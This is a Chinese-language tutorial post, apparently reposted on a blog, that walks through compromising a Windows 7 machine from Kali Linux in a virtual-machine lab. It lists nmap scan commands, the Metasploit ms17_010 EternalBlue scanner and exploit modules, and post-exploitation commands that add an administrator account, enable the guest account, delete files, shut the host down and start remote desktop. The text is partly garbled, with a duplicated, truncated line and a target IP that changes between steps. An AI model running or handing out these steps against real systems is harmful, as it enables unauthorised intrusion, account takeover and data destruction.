admin管理员组文章数量:1122850
title: kali入侵win7
tags: 教程
author: caijinbo
date: 2019-11-19
前提说明
1.在同个局域网内
2.准备纯净系统的win7系统电脑一台
3.准备kali系统一台
4.我的操作均是在虚拟机上完成,可能在物理机上效果会有所不同。
步骤
第一步: 扫描局域网内存活的主机:
nmap -sP 192.168.1.0/24
(扫描较快)
也可以直接用这条命令来扫描:
nmap -sS -sV -Pn 192.168.1.0/24
(扫描较慢)
nmap还有很多扫描用法,请自行查询。
第二步:扫描要攻击的主机:
nmap -sS -sV -Pn 192.168.1.111
(例如目标主机是192.168.1.111)
第三步:Kali终端输入msfconsole 或者手动点击软件图标
第四步:先使用use auxiliary/scanner/smb/smb_ms17_010
利用ms17_010这个漏洞入侵
紧接着输入show options这个模块进行漏洞的分析,看看这个445端口是否能被入侵。
第五步:使用攻击模块:
use exploit/windows/smb/ms17_010_eternalblue
输入show targets查看这个模块适用于哪些系统的主机
第六步:设置RHOST,即要攻击的主机ip:
set RHOST 192.168.0.111
第七步:执行run
如果电脑存在上面的那个漏洞的话,这一步就可以进去了
第八步:执行想要操作的指令
删除文件夹:rmdir 目标文件夹
删除文件:del
创建文件夹:md 文件夹
查看目标的磁盘信息:wmic logicaldisk
查看系统信息:systeminfo
创建一个用户:net user test 123456 /add
将创建的test用户赋予管理员权限:net localgroup administrator test /add
查看有哪些用户:net user
查看账户的属性:net user test
立刻关机:shutdown /s/f
net user guest /active:yes 激活guest用户
net user guest 12345 用guest用户登陆后用将密码改为12345
net password 密码 更改系统登陆密码
netstat -n 查看端口的网络连接情况,常用netstat -an
net start 查看开启了哪些服务
net start 服务名 开启服务;(如:net start telnet, net start schedule)
net stop 服务名 停止某服务
net user admin /active:no 将用户admin禁用
net user admin /active:yes 将用户admin激活
tive:no 将用户admin禁用
net user admin /active:yes 将用户admin激活
net start termservice termservice 是远程桌面服务
本文标签: kali
版权声明:本文标题:kali入侵win7 内容由网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:http://www.betaflare.com/biancheng/1726407200a1090929.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论